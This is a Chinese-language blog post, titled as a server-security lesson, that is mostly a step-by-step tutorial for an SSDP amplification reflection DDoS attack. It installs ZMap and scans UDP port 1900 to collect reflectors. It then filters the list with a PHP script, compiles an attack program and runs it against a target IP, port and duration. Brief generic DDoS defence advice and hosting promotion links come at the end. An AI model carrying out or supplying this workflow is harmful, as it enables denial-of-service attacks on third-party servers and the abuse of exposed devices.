快速学习服务器安防原理—–SSDP放大反射攻击扫描教程刨析,放大列表扫描原理教程!

搬瓦工精品GIA

ZMap安装

由于系统很多,不同的系统有不同的安装方法,具体如下:

 

1、Debian 和 Ubuntu 安装命令:

sudo apt install zmap

 

2、Fedora、 CentOS 和 RHEL 安装命令:

sudo yum install zmap

 

3、macOS

brew install zmap

 

4、Arch Linux

sudo pacman -S zmap

 

SSDP放大反射攻击扫描教程,放大列表扫描教程!

我用的是centos 64位

先更新系统

yum -y update

区分centos6 centos7 执行不同的命令!

Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos 7 
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
     https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-12.noarch.rpm

安装必要的依赖环境!

yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap

上传这里的文件到你的机器!

开始扫描SSDP放大列表

screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt

等扫描完成后,我们开始执行过滤!

php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000

然后,编译我们的攻击脚本,

gcc -pthread ssdp.c -o ssdp
./ssdp <target IP> <target port> <reflection file>  <time (optional)>

 

五、总结

DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:

  1. 保证服务器系统的安全
    首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。
    
  2. 隐藏服务器真实IP
    服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。
    
    另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。
    
    总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。
    
    
    
    搬瓦工注册链接:

    精品稳定服务器购买

转载请注明阿虎爱分享http://ahushare.com
阿虎爱分享 » 快速学习服务器安防原理—–SSDP放大反射攻击扫描教程刨析,放大列表扫描原理教程!

发表评论

阿虎爱分享YouTube频道

立即查看 了解详情